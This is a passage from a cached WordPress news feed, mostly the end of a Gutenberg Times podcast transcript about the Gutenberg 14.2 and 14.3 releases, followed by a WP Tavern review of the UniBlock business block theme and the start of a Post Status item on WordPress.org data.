that.&nbsp;</p>\n\n\n\n<p><em>Dave Smith</em>: Yes.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: The color block also got now color support in 14.2, and polish styles, which is nice because I think the color block&#8230; Calendar block, color block. Sorry, let&#8217;s do that again.&nbsp;</p>\n\n\n\n<p><em>Dave Smith</em>: Can you say it again?&nbsp;</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Calendar block got now color support and polish style. And I&#8217;m really happy that the calendar block got some more love now because I think that&#8217;s the first change since the beginning of the&#8230; Just the last five years since the calendar block actually made it into the block editor. So that&#8217;s just really cool.</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah, that&#8217;s nice to see. Under patterns we&#8217;ve also got new categories, as I mentioned, for banners and footers. The reason we&#8217;ve got those is because we&#8217;ve already got the headers category for patterns, but that was really intended for more global elements that might be at the top of your site. But unfortunately people were putting in things like what you might call a hero section, sort of a standout call out within the flow of the page, and that wasn&#8217;t really the right place to put it. So to disambiguate those, they&#8217;ve created a new pattern category called banners and you can put all your hero sections in there as you wish. There&#8217;s also another one called footers, I think that does what it says on the tin, it&#8217;s just complimentary to headers really.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Right. Yes. Yeah. And those are the perfect candidate for actually classic themes to use in their themes, is the headers and footers. But the pattern category is something, it&#8217;s a little bit different. But there are also template parts that go with that. And isn&#8217;t there a semantic recognizing that if there is somebody edits the footer or the header, they get the respective category of patterns for choices in the editor? So I think that was also a reason, definitely for the footer pattern category. So the footer template part can have their own patterns.</p>\n\n\n\n<p><em>Dave Smith</em>: Yes, and to suggest the most appropriate pattern for you. Yeah, that sounds like a good reason for that change.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah. Another change was a link auto completer that is enabled for the blocks. Is that the&#8230; Oh, right, right. We talked about that. That&#8217;s the bracket bracket auto completer where it shows you, you just put in bracket bracket in the paragraph and in the list block and now in all blocks and you get a choice of the latest published posts or pages that you have on your site. That&#8217;s a very fast way to do inner links on your site, which actually help you with SEO as well, but also keep your reader on the site. So this is a great tool to do that.</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah, it&#8217;s good to see that in all blocks now, not just the paragraph block. Especially with the new list and blocks having inner blocks, so that&#8217;s quite important there.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: And it was missing from the list block actually.&nbsp;</p>\n\n\n\n<p><em>Dave Smith</em>: Yes.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: And I used that quite a bit on the Gutenberg Times the list block where I have just a list of links and all of a sudden it didn&#8217;t work anymore. So guess what I did?</p>\n\n\n\n<p><em>Dave Smith</em>: Oh, I can guess. So next up, we&#8217;re onto the block live section and there&#8217;s been quite a number of enhancements to blocks. The main one is the query loop block now suggests patterns based on the active variation. So for this one, imagine if you have a query loop block, you might register a variation for it for something like listing out a list of products from your products custom post type. But that variation itself can also register patterns. So you might have a pattern, which is the list layout, and then another pattern which is list products in the grid. So you&#8217;ve got those two patterns.&nbsp;</p>\n\n\n\n<p>So what happens now is when you insert your products list variation, it will suggest to you those two patterns that the variation is registered. So it&#8217;s surfacing the most appropriate pattern for your query loop variation. And that&#8217;s quite powerful for things like e-commerce sites and things like that. So you&#8217;re not getting loads and loads of patterns you have to pick from that are completely irrelevant to the type of query loop you are inserting.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, it&#8217;s one of the features that quite a few agencies really love because they can narrow down the customization that a user can do and be very strict in certain things, but give a little bit of freedom. That also pairs with the content locking features that come with 6.1. I know I&#8217;m jumping back and forth, but it all comes together in one thing, in that it will be the, it&#8217;s the site editor thing. Yeah. So yeah, there also it was a great writing flow, a fix for it. Now when you partial select between blocks there and now you can drag it again, which wasn&#8217;t possible before.</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah, you had, when you were dragging from one across a number of blocks, it would have this strange effect where it would go back to showing you the first block you&#8217;d dragged. So if you had a sidebar open as you would drag in between the blocks, it would flash between the first block and then the multi-select, the first block, the multi-select. And now what happens is just when you start, you click on the first block you drag and the toolbar and everything around it stays based on the first block that you selected. It&#8217;s a small change you probably wouldn&#8217;t notice, but if you were doing a lot of multi-selection, especially with drag and click and drag, you would definitely notice it flickering back and forth. It was really, really distracting. So that&#8217;s just another nice quality of life improvement there.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, thank you for pointing that out. Cool.</p>\n\n\n\n<p><em>Dave Smith</em>: Another one was when you&#8217;re creating templates in the editor, under the template screen. Previously you could, accidentally, if you were a bit overzealous with your clicking, you might create a number of templates because you could just repeatedly click the create button for any of the templates. So yeah, people were ending up with five versions of the one template and just thinking, &#8220;Well, how did that happen? I only clicked once.&#8221; So yeah, we&#8217;ve fixed that so it&#8217;s not possible to do that anymore.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, that&#8217;s definitely a nice fix there because it&#8217;s disconcerting for anybody who has that. And then the last one for 14.2.</p>\n\n\n\n<p><em>Dave Smith</em>: Yes, under testing we have&#8230; Under storybook. Now this is quite interesting, they&#8217;ve set up a new development aid which adds visual regression testing to the components in storybook. So components are like the low level UI components that we use to build the editor as a whole, not just blocks, but everything as a whole. And storybook showcases those in one place. And what they&#8217;ve done is they set up a visual dipping tool. So you run the test, it takes a screenshot of your component at a point in time, and then the next time you run the test it takes another screenshot and says, &#8220;Is this different to the previous one?&#8221; And if a certain threshold difference is passed, then it flags it up and says, &#8220;This test has failed,&#8221; and then a human comes along and looks at it.&nbsp;</p>\n\n\n\n<p>And it caught my eye because I thought, &#8220;Wow, this could be something that we could extrapolate out to maybe other parts of the editor,&#8221; like actual blocks themselves. Because with the best rule in the world, you&#8217;re can have all sorts of end-to-end tests and unit tests and all sorts of things like that. But the end of the day a lot of things are visual changes that only a human can notice. So if we&#8217;ve got this extra step of automation picking up on these things, it might help. Currently this is only running locally, it&#8217;s not running on continuous integration on GitHub, but maybe in the future someone could take that and run with it and maybe it could help.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: That&#8217;s a really great idea. I think that is something that developers who learn how to work with a block editor definitely can use that in their local development into figuring out, &#8220;Okay, what changed now? Yeah, what did I do wrong?&#8221; In the debugging parts, they don&#8217;t need to look at the console first when they see something like that. And they build visual regression into their own components that are based on the storybook components. So we are at the end of the Gutenberg plugin version 14.2. What did Gutenberg 14.3 bring to us?&nbsp;</p>\n\n\n\n<p><em>Dave Smith</em>: Okay.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Go ahead.</p>\n\n\n\n<p><em>Dave Smith</em>: So 14.3 we had release lead Aaron Robertshaw and he&#8217;s posted the what&#8217;s new in Gutenberg 14.3 post on Make Blog. And WP Tavern have also covered this in Gutenberg 14.3 improves image drag and drop. And those links will be in the show notes. Let&#8217;s take a look at the change log, what have we got first here, Birgit?</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Oh, first up is the post author blog now includes an option to link actually to the author archive, and this is definitely something that was&#8230; It&#8217;s a small tweak and it was probably a good first issue, but it&#8217;s definitely helping a lot of sites that have multiple authors to use it in the templates. Because then you also can, so you have an author archive and then when you template that you can also, there was one change in one of the other plugins that you can actually add the description that comes from the user database about the buyers, put it on top. So you have the author, you have the description, and then the list of all the blocks that now you can do link to that page from each host when you add the post author block to the post template. It&#8217;s a lot of templates and blocks.</p>\n\n\n\n<p><em>Dave Smith</em>: Well, I can see that it&#8217;s a small change, but I think it&#8217;s pretty handy for sites that produce a lot of content. I suppose the Gutenberg Times in fact would be one example of that.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, absolutely. Absolutely.</p>\n\n\n\n<p><em>Dave Smith</em>: The next change we&#8217;ve got is we&#8217;re now using the tools panel in global styles. The typography panel is quite complex, as we mentioned before, it&#8217;s got things like letter spacing, case, all sorts of things you can change on typography these days. What it&#8217;s doing is now bringing the global styles interface into line with the typography interface that appears in blocks. So if you need to reset all the changes that you&#8217;ve made to typography across the entire site, on like a heading block, it&#8217;s now really easy to do that through a standard interface, which is a nice win there.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Excellent. Yeah. And now the feature that was grabbing the attention of Sarah Gooding at the WP Tavern is to allow an image to drop into an empty paragraph block and to create an image block. I think I intuitively thought that was already possible, but maybe I just dragged it between blocks. So now you can, every time you just hit enter on at the end of one block, you can just drag your image into an empty paragraph and it adds it to the site.</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah, I expect there&#8217;s probably instances where container blocks have a paragraph block as the default, so now you can just plug an image into that. That&#8217;s probably why it helps a lot as well. So yeah, nice little enhancement there.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: That&#8217;s great. Especially for the cover block, and group block, I can see that, yeah. Yeah, the next one&#8230;</p>\n\n\n\n<p><em>Dave Smith</em>: The next one is improvements to the writing flow, we&#8217;re now implementing of standardized controls that feel quite natural when you compare them with other text editors. So you can now hold down the alt key and use the arrow keys to jump around in blocks of text. So an example given is if your cursor is towards the end of a long paragraph, you can press alt and up arrow to move straight back to the beginning of that paragraph. And similarly, alt down arrow will move you to the end of that block of text. And these are all small little tweaks to the writing flow, but it does allow you to move quickly around text and brings Gutenberg into line with many other normal text editors.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, I think this was very missed for those who use other text editors too, because it throws you when your shift or control and left arrow doesn&#8217;t get you to the beginning of the line and you need to use the mouse to get there. So yeah, I really love that writing flow improvement there. So the next one, it&#8217;s the WP HTML tag processor, I think you need to explain to me and our listeners what that actually does, Dave.</p>\n\n\n\n<p><em>Dave Smith</em>: I&#8217;ll give it a good go. Yes, this is a technical change, but one that is important for people who are working with dynamic blocks. So often dynamic blocks, the ones that use PHP to output the content to the front of the site, because they&#8217;ve got some sort of dynamic requirements and they have to list a post or grab your, I don&#8217;t know, post site logo or something like that. In fact, the site logo&#8217;s a good example because there&#8217;s an attribute to control whether the site logo should be a link or not. And if it isn&#8217;t going to be a link, then we need some way to strip out the anchor tag from the resulting html.</p>\n\n\n\n<p>And before this processor was added, we had to do this with what&#8217;s called regular expressions, which are notoriously unreliable for parsing and modifying html. And this was happening across a number of blocks and the use cases were getting ever more complex, especially around things like using the post featured image in the mark of the cover block for example.</p>\n\n\n\n<p>So what we&#8217;ve done here is we&#8217;ve added this HTML tag processor, which is a very standardized way to walk through the HTML of a given block, and then allow you to make common modifications to it, such as adding or removing class names. Seems like a small thing, but actually unlocks many, many doors and greatly simplifies working with blocks. Not only for core blocks like cover, gallery, and heading, but of course third party blocks can also take advantage of this now and avoid having to write lots of regex, which of course no one likes doing as far as I&#8217;m aware.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, I&#8217;m really excited about that because it improves so much the developer experience for the block editor and it&#8217;s such a nice tool to be a little bit more secure about what you&#8217;re changing. And if something else is in there, does it screw up your edit or your plugin for instance, or the block? Yeah. So yeah, I&#8217;m really looking forward to the dev note for that, it won&#8217;t come until 6.2 and we don&#8217;t know yet what the planning is for next year, but I know that the leadership is working on all the things that come with 6.2, so we will soon have some information about that. But yes, this is definitely&#8230; Try it out, it&#8217;s in plugin 14.3, so the team definitely would need some feedback on that to see if it actually lives up to its expectation.&nbsp;</p>\n\n\n\n<p><em>Dave Smith</em>: Yes.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: And then we have some more changes in the block library and one is also for the image and the team fixed the crop area aspect ratio for when you rotate an image and you crop it, that it keeps the aspect ratio for it. So it&#8217;s a nice change and it keeps you a little bit more safe when you do cropping on your images.</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah, absolutely. The next one is another fix and it is for link colors in some theme contexts, specifically 2022. There was an issue whereby if an ancestor of the navigation block set a link color, then it would override any text color set on the navigation block, which is really, really confusing because say you had a, I don&#8217;t know, a green link color set on an a parent root block and you had red text color set in your navigation, you&#8217;d be seeing the green color in the editor thinking, &#8220;Well, what&#8217;s happened?&#8221; You wouldn&#8217;t know where this color&#8217;s coming from. It ended up being a temporary patch has being put in to basically increase the specificity of the CSS. But in the longer term we&#8217;re looking to migrate the nav block to use standardized color controls, but it&#8217;s a lot more complex than you&#8217;d imagine. But yeah, if you&#8217;d been experiencing that problem in your theme, then you hopefully shouldn&#8217;t have that problem anymore as of 14.3.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: And that problem was on both ends, editor and front end?</p>\n\n\n\n<p><em>Dave Smith</em>: Yes.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, good to fix, yeah.</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah. And there&#8217;s a next one, which is to re-add styles that were removed from classic themes. Why would we remove styles from classic themes, you ask? Well, obviously it was an accident. Basically a lot of the core styles have been moved to theme JSONs so that we can pass them programmatically, but in doing so some of the styles for buttons were lost and no longer output, which meant that classic themes had blank buttons for a little bit. So now those are in a separate style sheet and buttons are back looking nice again for classic themes by default.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: And I&#8217;m just going through that, and yes, that had been ported back, I think to&#8230; I&#8217;m not sure, is that ported back to WordPress 6.1? It looks like it but I&#8217;m not sure.</p>\n\n\n\n<p><em>Dave Smith</em>: I assumed that it had, if not, I think it has&#8230; Yes, it has been back ported to 6.1.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, that&#8217;s a good thing, yes. So 6.1 is not having some backwards compatibility issues with classic themes, so that&#8217;s definitely a good thing. And then there were quite a few code quality changes that updates some of the tooling and linking code. Linting is when&#8230; Oh, maybe you would explain it better than I do, Dave.</p>\n\n\n\n<p><em>Dave Smith</em>: It&#8217;s just programmatically checking your code for common formatting changes. So WordPress requires you to have a space around parentheses, for example, so it will automatically check those and fix them for you. That&#8217;s linting.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: And the reason behind removing lodash dependencies from some of the JavaScript, I think was performance reasons, right? That it increased performance when you don&#8217;t need to load lodash.</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah, lodash is a fairly sizable library, so there&#8217;s an effort underway to completely remove that dependency, which should reduce the bundle size going to the editor, which is always a good thing.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, yeah. Speaking of tools, there&#8217;s another&#8230; It&#8217;s not a tool thing. There was quite a few discussions around the experimental APIs that made it into the WordPress code base, but now there is&#8230; Adam Zielinski actually put a proposal together on how to limit that access and the first version of it is now available in the Gutenberg plugin. Do you have some more information behind that?</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah, so experimental APIs were quite controversial because Gutenberg does need to iterate and move quite quickly compared to core, for example. And so they often introduce experimental APIs and they&#8217;re not guaranteed to be stable and might break at any time. But of course some of these APIs were ending up going into a core WordPress release because they hadn&#8217;t been stabilized at the point that WordPress was released. And that was understandably something that we didn&#8217;t want to happen because WordPress has a commitment to backwards compatibility, so you can&#8217;t really have experimental APIs going into a core release.&nbsp;</p>\n\n\n\n<p>So a middle ground had to be found between those two positions, one, that Gutenberg needs to iterate quickly, and number two, that core needs to not have breaking changes in it, which is entirely legitimate. So the way that this has been done now is from now on, if Gutenberg wants to expose experimental APIs views within its code base, it has to do so quite explicitly. You have to go through a number of quite laborious steps to do so, which is important. And number two, if you are a plugin developer and you choose to consume and experimental APIs, you also have to jump through a number of code hoops in order to do that.&nbsp;</p>\n\n\n\n<p>One of which actually requires you to type in, manually, a string of text which says something to the effect of, &#8220;I know that using this experimental API will break my plugin on the next release,&#8221; or something along those lines. I mean, we laugh, but the point is that it is to educate people that if you do use this, it&#8217;s it is at your own risk. And I like to think this is quite a nice middle ground between the two positions and hopefully we&#8217;ll see it come to a fruition in the next couple of releases as the current experimental APIs are stabilized and all future ones have to go through this complex setup state in order to be exposed anyway.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah. And it wouldn&#8217;t so much be hard if only the Gutenberg plugin, that it would use the experimental APIs. But I think because most plugin developers that adopted block development also looked at the source code of the plugin and learned how, &#8220;Oh, let&#8217;s see how the core developer do that.&#8221; And they used that experimental API in their own plugins for many, many years now. And now that&#8217;s really hard to deprecate. If just WordPress using it, it would be easier to deprecate that because nobody else uses it and everybody would know how to change that. But because they are not only the plug-ins that are in the repository, they are plugins that are done by freelancers and agencies for their sites that are third-party plugins that are not in the repo might be using it. So that backwards compatibility promise is really something that needs to&#8230; Though the experimental APIs cannot be deprecated without breaking those and it also cannot be it need, they actually should need to be documented if third-party use them. But the nature of experimental API is actually not documented and can disappear at any time. But that is not possible when they&#8217;re in WordPress core.&nbsp;</p>\n\n\n\n<p>So yeah, so there is a solution coming out and I think there is a lot of&#8230; We talked about it before maybe with&#8230; I&#8217;m not quite sure. On the Change Log before when for 6.0 when there were, I don&#8217;t know, 280 experimental APIs that are merged at the core. Some of them are really only used for the Gutenberg plugin or the block editor, but some of them were actually used in the wider ecosystem. So speaking of JavaScript library, there&#8217;s the next feature is remove enzyme completely, and enzyme is a react testing library.</p>\n\n\n\n<p><em>Dave Smith</em>: Yes, that&#8217;s right.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Right. Yeah. But now react has created their own testing library, so that&#8217;s why it doesn&#8217;t have to be bundled anymore, right?</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah. I mean, we would be using these two testing libraries on our components, one was enzyme and the other one is react testing library. And react testing library, which is built on top of react&#8217;s own library, has its own nicer encourages you to test things in a&#8230; More experiencing them how the user would interact with the component, so it encourages better accessibility practices, et cetera. So it made sense to standardize towards one. So finally, after lots of work by lots of contributors, enzyme has been removed. And now if you want to test your components, you should use react testing library.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: All right. Yeah. And in the PR, there are also some code examples on how to do this for your own code, what you need to do in terms of taking out enzyme and using react library, so check out the PR 44494. And of course it&#8217;s on the change log for 14.3. So this concludes 14.3 and our Gutenberg plugin releases and we&#8217;ve come to the things that we discuss what&#8217;s still an active development, but what might come or will come to the Gutenberg plugin in the near future. Dave, you are part of the navigation project, almost exclusively, what is in store for the navigation project?</p>\n\n\n\n<h3><strong>What’s in Active Development or Discussed</strong></h3>\n\n\n\n<p><em>Dave Smith</em>: Yeah, absolutely. Well, we&#8217;ve just rounded off the 6.1 cycle, we&#8217;re moving into thinking about 6.2. And there&#8217;s been a number of priorities suggested on the navigation tracking issue, which we&#8217;ll put a link to in the show notes, about what we should focus on for the 6.2 cycle for navigation in the block editor, including the navigation block. The proposal is at the moment to put a specific focus on editing and managing menus within the editor itself. It sounds obvious, but previous 6.1 is focused more on importing menus and automatic fallback behavior. Whereas this one is we&#8217;re going to try and actually the editing and managing of menus themselves. So there&#8217;s that.&nbsp;</p>\n\n\n\n<p>We&#8217;re also going to be working on foundational issues and improving tests for better reliability and some more under the hood technical changes such as moving from in IDs to slugs when you&#8217;re relating a navigation menu to a block. So we&#8217;re looking for feedback on those proposals, so if anyone wants to input, please go along to that tracking issue and comment and we&#8217;d be only too glad to hear from you.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: All right. So there was, at the beginning of I think 5.8 or something like that, there was the idea to actually have a navigation screen also for organizing menus. Is it an idea to go back to that? Or is it all kind of happening in the sidebar? Do you know what the approach is going to be?</p>\n\n\n\n<p><em>Dave Smith</em>: Yes. Yeah. I mean, the current thinking is that having a separate navigation editor screen, there was an experiment for that for a while in the plugin, that&#8217;s now been disabled, there&#8217;s no plan to continue to work on that. But instead the idea is to bring that ability to manage multiple menus into the editor canvas itself. If you think about things like templates and template parts, you can do that all within the editor, there&#8217;s focus modes for template parts.&nbsp;</p>\n\n\n\n<p>And the same thing will hopefully apply to navigation, so you&#8217;ll be able to manage an individual navigation block and it&#8217;s associated menu within the editor within the block itself. But also if you have lots of other menus and you want to edit one that isn&#8217;t on the canvas, for example, there will be a global navigation sidebar that you can pop open from that W WordPress menu on the top left and there you&#8217;ll be able to choose the different menus and move things around, edit them, things like that. And so the foundational work for that should be going into 6.2, the actual screen may not appear in 6.2 but at least the foundational work will be going in to make that possible. So yeah, that&#8217;s the state of play on that particular aspect.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Well, thank you to elaborate on that. And then, so Andrew Sorong has also created a new tracking issue for the layout options that are going to come after 6.1. And layouts are the ones that, for all the layout options, design tools and other refinements. And 6.1 comes with three layouts now, the flow layout, the flex layout, and the constraint layout, making it possible so the inner blocks are following their parents, so to speak, in that.&nbsp;</p>\n\n\n\n<p>But there are also additional improvements in the works. One was the fixed positions for head and footer template parts, meaning it&#8217;s stuck to the top or to the bottom. Also have some more layout consistencies, like an ad layout support to the cover block. Also some minor things like allow the change block cap in the editor and all that. So we&#8217;ll have that link also in the show notes, so the tracking issue, so you see what the team is working on and what they have on their priority list so you can follow along and also give input. It&#8217;s really important that people test along the way so it gets a more stable version of it.</p>\n\n\n\n<p><em>Dave Smith</em>: Ooh, I&#8217;m excited about fixed position head and footer template parts.&nbsp;</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah.</p>\n\n\n\n<p><em>Dave Smith</em>: A lot of people ask me about that for navigation, so I can imagine.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: I can imagine, yeah. So yeah, it seems that we are at the end of our show today. And I&#8217;m so happy, Dave, that you joined me today on going through the two change logs and talk about WordPress 6.1 and all these great tools that you brought in from the community.</p>\n\n\n\n<p><em>Dave Smith</em>: It was an absolute pleasure, thank you.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Is there anything else that you wanted to alert our listeners to that we didn&#8217;t talk about before, before we close the show?</p>\n\n\n\n<p><em>Dave Smith</em>: No. Actually, I think we&#8217;ve covered quite a lot in this show. So no, thank you.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yes, we did. So when people want to reach you, how would they connect with you apart from the YouTube channel that we are going to put in the show notes?</p>\n\n\n\n<p><em>Dave Smith</em>: Sure. I think probably the best way is through WordPress Slack, I&#8217;m Get Dave on WordPress Slack. Feel free to send me a DM if you&#8217;d like to discuss anything.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Excellent. And as always, the show notes will be published on GutenbergTimes.com/podcast, this is number 74. And if you have questions and suggestions and news you want to include, send them&#8230; Or you want us to include, send them to <a href=\"mailto:ChangeLog@GutenbergTimes.com\">ChangeLog@GutenbergTimes.com</a>, <a href=\"mailto:ChangeLog@GutenbergTimes.com\">ChangeLog@GutenbergTimes.com</a>. Thanks again for listening and being part of our show. Thank you, Dave. And this is goodbye for me, bye-bye.</p>\n\n\n\n<p><em>Dave Smith</em>: Bye.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 15 Oct 2022 18:07:25 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Birgit Pauli-Haack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"WPTavern: UniBlock: A Free Business Block Theme for WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=138471\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wptavern.com/uniblock-a-free-business-block-theme-for-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3855:\"<p>WPZOOM is coming in strong with its first block theme approved for the WordPress Themes Directory. <a href=\"https://wordpress.org/themes/uniblock/\">UniBlock</a> is a beautifully designed theme that is well-suited for businesses and freelancers. The company plans to adopt the concept of full-site editing in other WPZOOM themes as well, following the release of UniBlock.</p>\n\n\n\n<img />\n\n\n\n<p>UniBlock&#8217;s default look is sporting a darker color palette in the navigation and above the fold, with a lighter background for the rest of the website. The video on the sample homepage uses the free <a href=\"https://wordpress.org/plugins/wpzoom-video-popup-block/\">WPZOOM Video Popup Block</a> plugin, which supports Vimeo and YouTube. It&#8217;s a simple, lightweight block that allows users to customize the play button and play icon.</p>\n\n\n\n<p>After activating the theme, clicking on &#8216;Customize&#8217; will prompt the user to install the video plugin. It can also be converted to a Custom HTML block or removed entirely at the user&#8217;s discretion.</p>\n\n\n\n<p>UniBlock&#8217;s 19 custom block patterns include everything one might expect from a business theme but, most impressively, it ships with five full-page patterns:</p>\n\n\n\n<ul>\n<li>Front Page</li>\n\n\n\n<li>About</li>\n\n\n\n<li>Services</li>\n\n\n\n<li>Blog</li>\n\n\n\n<li>Contact</li>\n</ul>\n\n\n\n<p>Alternatively, users can assign the page template in the post settings to get the same effect.</p>\n\n\n\n<p>These full-page patterns are convenient for speedy page building. They make it possible to get a basic business website up in a matter of minutes. Here&#8217;s an example of the Services full-page pattern that will instantly embed when selected. Users can delete any sections they don&#8217;t need, add more blocks and patterns, and quickly fill in all their own information.</p>\n\n\n\n<img />\n\n\n\n<p>Separately there are patterns for a footer with text, links, multiple arrangements of featured boxes with text and button, multiple designs for call-to-action sections, pricing tables, team members with social icons, testimonials, header cover, sidebar, 404 page, and more.</p>\n\n\n\n<p>Users can delve even further into customizing the templates with the site editor, as UniBlock is packaged with nearly two dozen templates and template parts. Here they can also edit the menu and adjust global styles.</p>\n\n\n\n<img />\n\n\n\n<p>WPZOOM is developing a Pro version of the theme to release in a few weeks with support for importing the whole demo, multiple color schemes, multiple demos, premium block patterns, and additional header and footer layouts. </p>\n\n\n\n<p><a href=\"https://demo.wpzoom.com/uniblock/\">Check out the demo</a> on the WPZOOM website to see the theme in action. WPZOOM has also written <a href=\"https://www.wpzoom.com/documentation/uniblock\">documentation for UniBlock</a>, which covers general topics like how to use block patterns, how to set up the front and blog pages, and how to create a menu in the site editor. Since the company&#8217;s most popular themes are what would be considered classic themes, UniBlock is new territory for most of their customers. It is so far the only block theme among WPZOOM&#8217;s collection of 31 themes. </p>\n\n\n\n<p>Block theme adoption is slowly making its way across WordPress&#8217; major theme shops and the official directory is now hosting 160 themes tagged for full-site editing. As more longtime theme companies make their block theme debuts and develop a base for future themes, WordPress users may start to see a rapid acceleration of the number and variety of block themes available. UniBlock is so far one of the few block themes in the directory with a singular focus on business websites. It is available to <a href=\"https://wordpress.org/themes/uniblock/\">download for free from WordPress.org</a> or via the admin themes panel.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 15 Oct 2022 01:00:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"Post Status: Does WordPress.org Data Belong to the WordPress Community? Should It?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=128245\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"https://poststatus.com/does-wordpress-org-data-belong-to-the-wordpress-community-should-it/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:959:\"<p class=\"has-drop-cap\">Today <strong>WP Watercooler</strong> sought <a href=\"https://wpwatercooler.com/wpwatercooler/ep432-solutions-to-the-active-growth-problem/\">Solutions to the Active Growth Problem</a>. In a pointed but respectful conversation moderated but <strong>Sé Reed</strong>, the Watercooler crew got one new detail from <strong>Otto</strong> about the decision to remove the active install charts: it was made months ago. How should the data collected by 